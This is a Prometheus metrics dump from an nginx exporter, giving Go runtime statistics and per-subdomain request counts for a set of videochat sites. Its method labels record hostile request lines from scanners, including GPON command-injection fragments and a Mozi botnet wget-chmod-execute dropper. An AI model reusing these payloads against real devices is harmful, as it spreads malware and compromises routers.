# HELP go_gc_duration_seconds A summary of the GC invocation durations. # TYPE go_gc_duration_seconds summary go_gc_duration_seconds{quantile="0"} 1.8622e-05 go_gc_duration_seconds{quantile="0.25"} 2.4255e-05 go_gc_duration_seconds{quantile="0.5"} 3.0444e-05 go_gc_duration_seconds{quantile="0.75"} 6.5337e-05 go_gc_duration_seconds{quantile="1"} 0.003270855 go_gc_duration_seconds_sum 804.255807678 go_gc_duration_seconds_count 2.623262e+06 # HELP go_goroutines Number of goroutines that currently exist. # TYPE go_goroutines gauge go_goroutines 50 # HELP go_memstats_alloc_bytes Number of bytes allocated and still in use. # TYPE go_memstats_alloc_bytes gauge go_memstats_alloc_bytes 6.5155856e+07 # HELP go_memstats_alloc_bytes_total Total number of bytes allocated, even if freed. # TYPE go_memstats_alloc_bytes_total counter go_memstats_alloc_bytes_total 5.8605289595464e+13 # HELP go_memstats_buck_hash_sys_bytes Number of bytes used by the profiling bucket hash table. # TYPE go_memstats_buck_hash_sys_bytes gauge go_memstats_buck_hash_sys_bytes 1.985084e+06 # HELP go_memstats_frees_total Total number of frees. # TYPE go_memstats_frees_total counter go_memstats_frees_total 2.31916295441e+12 # HELP go_memstats_gc_sys_bytes Number of bytes used for garbage collection system metadata. # TYPE go_memstats_gc_sys_bytes gauge go_memstats_gc_sys_bytes 5.791744e+06 # HELP go_memstats_heap_alloc_bytes Number of heap bytes allocated and still in use. # TYPE go_memstats_heap_alloc_bytes gauge go_memstats_heap_alloc_bytes 6.5155856e+07 # HELP go_memstats_heap_idle_bytes Number of heap bytes waiting to be used. # TYPE go_memstats_heap_idle_bytes gauge go_memstats_heap_idle_bytes 6.5789952e+07 # HELP go_memstats_heap_inuse_bytes Number of heap bytes that are in use. # TYPE go_memstats_heap_inuse_bytes gauge go_memstats_heap_inuse_bytes 6.7313664e+07 # HELP go_memstats_heap_objects Number of allocated objects. # TYPE go_memstats_heap_objects gauge go_memstats_heap_objects 1.426679e+06 # HELP go_memstats_heap_released_bytes_total Total number of heap bytes released to OS. # TYPE go_memstats_heap_released_bytes_total counter go_memstats_heap_released_bytes_total 5.5508992e+07 # HELP go_memstats_heap_sys_bytes Number of heap bytes obtained from system. # TYPE go_memstats_heap_sys_bytes gauge go_memstats_heap_sys_bytes 1.33103616e+08 # HELP go_memstats_last_gc_time_seconds Number of seconds since 1970 of last garbage collection. # TYPE go_memstats_last_gc_time_seconds gauge go_memstats_last_gc_time_seconds 1.7748426295383825e+09 # HELP go_memstats_lookups_total Total number of pointer lookups. # TYPE go_memstats_lookups_total counter go_memstats_lookups_total 0 # HELP go_memstats_mallocs_total Total number of mallocs. # TYPE go_memstats_mallocs_total counter go_memstats_mallocs_total 2.319164381089e+12 # HELP go_memstats_mcache_inuse_bytes Number of bytes in use by mcache structures. # TYPE go_memstats_mcache_inuse_bytes gauge go_memstats_mcache_inuse_bytes 6944 # HELP go_memstats_mcache_sys_bytes Number of bytes used for mcache structures obtained from system. # TYPE go_memstats_mcache_sys_bytes gauge go_memstats_mcache_sys_bytes 16384 # HELP go_memstats_mspan_inuse_bytes Number of bytes in use by mspan structures. # TYPE go_memstats_mspan_inuse_bytes gauge go_memstats_mspan_inuse_bytes 978928 # HELP go_memstats_mspan_sys_bytes Number of bytes used for mspan structures obtained from system. # TYPE go_memstats_mspan_sys_bytes gauge go_memstats_mspan_sys_bytes 1.196032e+06 # HELP go_memstats_next_gc_bytes Number of heap bytes when next garbage collection will take place. # TYPE go_memstats_next_gc_bytes gauge go_memstats_next_gc_bytes 7.2924032e+07 # HELP go_memstats_other_sys_bytes Number of bytes used for other system allocations. # TYPE go_memstats_other_sys_bytes gauge go_memstats_other_sys_bytes 810684 # HELP go_memstats_stack_inuse_bytes Number of bytes in use by the stack allocator. # TYPE go_memstats_stack_inuse_bytes gauge go_memstats_stack_inuse_bytes 1.114112e+06 # HELP go_memstats_stack_sys_bytes Number of bytes obtained from system for stack allocator. # TYPE go_memstats_stack_sys_bytes gauge go_memstats_stack_sys_bytes 1.114112e+06 # HELP go_memstats_sys_bytes Number of bytes obtained by system. Sum of all system allocations. # TYPE go_memstats_sys_bytes gauge go_memstats_sys_bytes 1.44017656e+08 # HELP http_request_duration_microseconds The HTTP request latencies in microseconds. # TYPE http_request_duration_microseconds summary http_request_duration_microseconds{handler="prometheus",quantile="0.5"} 838509.356 http_request_duration_microseconds{handler="prometheus",quantile="0.9"} 938377.686 http_request_duration_microseconds{handler="prometheus",quantile="0.99"} 993895.225 http_request_duration_microseconds_sum{handler="prometheus"} 1.942756734637321e+12 http_request_duration_microseconds_count{handler="prometheus"} 3.586197e+06 # HELP http_request_size_bytes The HTTP request sizes in bytes. # TYPE http_request_size_bytes summary http_request_size_bytes{handler="prometheus",quantile="0.5"} 216 http_request_size_bytes{handler="prometheus",quantile="0.9"} 216 http_request_size_bytes{handler="prometheus",quantile="0.99"} 216 http_request_size_bytes_sum{handler="prometheus"} 7.74603177e+08 http_request_size_bytes_count{handler="prometheus"} 3.586197e+06 # HELP http_requests_total Total number of HTTP requests made. # TYPE http_requests_total counter http_requests_total{code="200",handler="prometheus",method="get"} 3.586197e+06 # HELP http_response_size_bytes The HTTP response sizes in bytes. # TYPE http_response_size_bytes summary http_response_size_bytes{handler="prometheus",quantile="0.5"} 700044 http_response_size_bytes{handler="prometheus",quantile="0.9"} 700057 http_response_size_bytes{handler="prometheus",quantile="0.99"} 700063 http_response_size_bytes_sum{handler="prometheus"} 1.326894108654e+12 http_response_size_bytes_count{handler="prometheus"} 3.586197e+06 # HELP nginx_http_response_count_total Amount of processed HTTP requests # TYPE nginx_http_response_count_total counter nginx_http_response_count_total{app="web",host="161.97.120.25",method="",status="400",vhost="-"} 291 nginx_http_response_count_total{app="web",host="161.97.120.25",method="",status="408",vhost="-"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="&language=0",status="400",vhost="-"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="*1",status="400",vhost="-"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="+/tmp/gpon80&ipv=0",status="400",vhost="-"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="/tmp/gpon80&ipv=0",status="400",vhost="-"} 7 nginx_http_response_count_total{app="web",host="161.97.120.25",method="0;sh+/tmp/gpon80&ipv=0",status="400",vhost="-"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="1111\\x0C\\x01\\x00\\x00\\x04\\x00\\x00\\x01\\x1B\\x09\\x00\\x00\\x02\\x01\\x00\\x00\\xFC\\x00\\x00\\x00admin\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00queryBasicCfg\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00",status="400",vhost="-"} 12 nginx_http_response_count_total{app="web",host="161.97.120.25",method="145.ll|'|'|SGFjS2VkX0Q0OTkwNjI3|'|'|WIN-JNAPIER0859|'|'|JNapier|'|'|19-02-01|'|'||'|'|Win",status="400",vhost="-"} 29 nginx_http_response_count_total{app="web",host="161.97.120.25",method="238\\x00ll|'|'|SGFjS2VkX0Q3NUU2QUFB|'|'|WIN-QZN7FJ7D1O|'|'|Administrator|'|'|18-11-28|'|'||'|'|Win",status="400",vhost="-"} 14 nginx_http_response_count_total{app="web",host="161.97.120.25",method="238\\x00ll|'|'|SGFjS2VkX0Q3NUU2QUFB|'|'|WIN-QZN7FJ7D1O|'|'|Administrator|'|'|19-11-28|'|'||'|'|Win",status="400",vhost="-"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="27;wget%20http://%s:%d/Mozi.m%20-O%20->%20/tmp/Mozi.m;chmod%20777%20/tmp/Mozi.m;/tmp/Mozi.m%20dlink.mips%27$",status="400",vhost="-"} 28 nginx_http_response_count_total{app="web",host="161.97.120.25",method=":\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xD4\\x07\\x00\\x00\\x00\\x00\\x00\\x00admin.$cmd\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x13\\x00\\x00\\x00\\x10isMaster\\x00\\x01\\x00\\x00\\x00\\x00",status="400",vhost="-"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method=";sh+/tmp/gpon80&ipv=0",status="400",vhost="-"} 8 nginx_http_response_count_total{app="web",host="161.97.120.25",method="=0",status="400",vhost="-"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="AMQP\\x00\\x00\\x09\\x01",status="400",vhost="-"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="A\\x00\\x00\\x00\\x03fH\\xBBd~\\x8E\\xFC\\x94g\\xD2\\xDB\\xFC\\xEE\\x8D\\xFF\\x98",status="400",vhost="-"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="CKGY",status="405",vhost="161.97.120.25"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="CONNECT",status="400",vhost="-"} 1335 nginx_http_response_count_total{app="web",host="161.97.120.25",method="DELETE",status="302",vhost="videochat.tv.br"} 8 nginx_http_response_count_total{app="web",host="161.97.120.25",method="DELETE",status="404",vhost="videochat.tv.br"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="DELETE",status="405",vhost="161.97.120.25:80"} 14 nginx_http_response_count_total{app="web",host="161.97.120.25",method="DELETE",status="405",vhost="videochat.tv.br"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="F",status="400",vhost="-"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="161.97.120.25"} 935 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="161.97.120.25:80"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="_mta-sts.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="aaexebs.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="admin.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="af.videochat.cafe"} 19543 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="af.videochat.date"} 25391 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="af.videochat.mx"} 29877 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="af.videochat.show"} 22619 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="af.videochat.tv.br"} 43350 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="af.videochat.world"} 48272 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="al.videochat.cafe"} 30748 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="al.videochat.date"} 19555 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="al.videochat.mx"} 21581 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="al.videochat.show"} 21764 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="al.videochat.tv.br"} 55337 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="al.videochat.world"} 49546 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="am.videochat.cafe"} 19333 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="am.videochat.date"} 20076 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="am.videochat.mx"} 19196 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="am.videochat.show"} 31927 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="am.videochat.tv.br"} 40072 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="am.videochat.world"} 36313 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="ampwdba.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="api.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="app.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="ar.videochat.cafe"} 19836 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="ar.videochat.date"} 17333 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="ar.videochat.mx"} 75715 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="ar.videochat.show"} 22250 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="ar.videochat.tv.br"} 96827 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="ar.videochat.world"} 59166 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="az.videochat.cafe"} 15274 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="az.videochat.date"} 14610 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="az.videochat.mx"} 17276 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="az.videochat.show"} 23721 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="az.videochat.tv.br"} 33360 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="az.videochat.world"} 44667 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="ba.videochat.cafe"} 42333 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="ba.videochat.date"} 18902 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="ba.videochat.mx"} 33281 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="ba.videochat.show"} 29038 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="ba.videochat.tv.br"} 54736 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="ba.videochat.world"} 56071 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="backend.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="be.videochat.cafe"} 60513 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="be.videochat.date"} 14998 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="be.videochat.mx"} 27588 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="be.videochat.show"} 21031 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="be.videochat.tv.br"} 39714 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="be.videochat.world"} 36477 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="bg.videochat.cafe"} 37388 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="bg.videochat.date"} 19553 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="bg.videochat.mx"} 27790 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="bg.videochat.show"} 30290 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="bg.videochat.tv.br"} 56880 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="bg.videochat.world"} 74058 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="bn.videochat.cafe"} 21991 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="bn.videochat.date"} 16034 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="bn.videochat.mx"} 20971 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="bn.videochat.show"} 22307 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="bn.videochat.tv.br"} 45662 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="bn.videochat.world"} 59779 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="bs.videochat.cafe"} 16031 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="bs.videochat.date"} 19916 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="bs.videochat.mx"} 31557 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="bs.videochat.show"} 30367 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="bs.videochat.tv.br"} 35258 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="bs.videochat.world"} 51606 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="ca.videochat.cafe"} 23094 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="ca.videochat.date"} 17707 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="ca.videochat.mx"} 23358 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="ca.videochat.show"} 25086 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="ca.videochat.tv.br"} 43890 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="ca.videochat.world"} 50036 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="ceb.videochat.cafe"} 34212 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="ceb.videochat.date"} 20794 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="ceb.videochat.mx"} 32618 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="ceb.videochat.show"} 27673 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="ceb.videochat.tv.br"} 47159 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="ceb.videochat.world"} 57176 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="chm.videochat.cafe"} 44808 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="chm.videochat.date"} 17482 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="chm.videochat.mx"} 14416 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="chm.videochat.show"} 26866 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="chm.videochat.tv.br"} 60187 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="chm.videochat.world"} 65532 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="cloijsk.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="cs.videochat.cafe"} 25334 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="cs.videochat.date"} 20716 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="cs.videochat.mx"} 20901 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="cs.videochat.show"} 24286 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="cs.videochat.tv.br"} 41319 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="cs.videochat.world"} 48089 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="cy.videochat.cafe"} 31351 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="cy.videochat.date"} 18932 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="cy.videochat.mx"} 25148 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="cy.videochat.show"} 19637 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="cy.videochat.tv.br"} 63117 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="cy.videochat.world"} 69982 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="da.videochat.cafe"} 24332 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="da.videochat.date"} 20748 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="da.videochat.mx"} 28829 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="da.videochat.show"} 19310 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="da.videochat.tv.br"} 41713 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="da.videochat.world"} 48143 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="de.videochat.cafe"} 39874 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="de.videochat.date"} 20708 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="de.videochat.mx"} 32075 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="de.videochat.show"} 32939 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="de.videochat.tv.br"} 36271 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="de.videochat.world"} 47698 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="demo.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="dev.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="ee.videochat.cafe"} 21557 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="ee.videochat.date"} 22597 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="ee.videochat.mx"} 27656 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="ee.videochat.show"} 20972 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="ee.videochat.tv.br"} 33004 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="ee.videochat.world"} 42140 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="eeiodfa.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="el.videochat.cafe"} 16762 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="el.videochat.date"} 13515 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="el.videochat.mx"} 19452 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="el.videochat.show"} 16777 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="el.videochat.tv.br"} 32325 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="el.videochat.world"} 39859 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="en.videochat.cafe"} 29890 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="en.videochat.date"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="en.videochat.mx"} 33684 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="en.videochat.show"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="en.videochat.tv.br"} 42179 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="eo.videochat.cafe"} 38910 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="eo.videochat.date"} 23252 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="eo.videochat.mx"} 36184 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="eo.videochat.show"} 30601 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="eo.videochat.tv.br"} 56051 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="eo.videochat.world"} 56398 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="es.videochat.cafe"} 29194 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="es.videochat.date"} 16737 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="es.videochat.show"} 30180 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="es.videochat.tv.br"} 133626 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="es.videochat.world"} 59805 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="et.videochat.cafe"} 27351 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="et.videochat.date"} 15793 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="et.videochat.mx"} 23184 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="et.videochat.show"} 24959 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="et.videochat.tv.br"} 63505 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="et.videochat.world"} 75767 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="eu.videochat.cafe"} 34016 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="eu.videochat.date"} 17561 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="eu.videochat.mx"} 31644 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="eu.videochat.show"} 32816 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="eu.videochat.tv.br"} 49248 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="eu.videochat.world"} 56162 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="fa.videochat.cafe"} 12272 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="fa.videochat.date"} 14949 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="fa.videochat.mx"} 32013 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="fa.videochat.show"} 29562 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="fa.videochat.tv.br"} 78534 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="fa.videochat.world"} 79222 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="fi.videochat.cafe"} 18228 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="fi.videochat.date"} 17319 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="fi.videochat.mx"} 22489 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="fi.videochat.show"} 27898 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="fi.videochat.tv.br"} 39877 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="fi.videochat.world"} 48567 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="fpobbvpmfscy.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="fr.videochat.cafe"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="fr.videochat.date"} 22942 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="fr.videochat.mx"} 31109 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="fr.videochat.show"} 23407 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="fr.videochat.tv.br"} 51336 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="fr.videochat.world"} 74972 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="ga.videochat.cafe"} 31782 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="ga.videochat.date"} 17438 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="ga.videochat.mx"} 26646 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="ga.videochat.show"} 22851 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="ga.videochat.tv.br"} 49836 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="ga.videochat.world"} 64564 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="gl.videochat.cafe"} 33054 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="gl.videochat.date"} 24208 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="gl.videochat.mx"} 48174 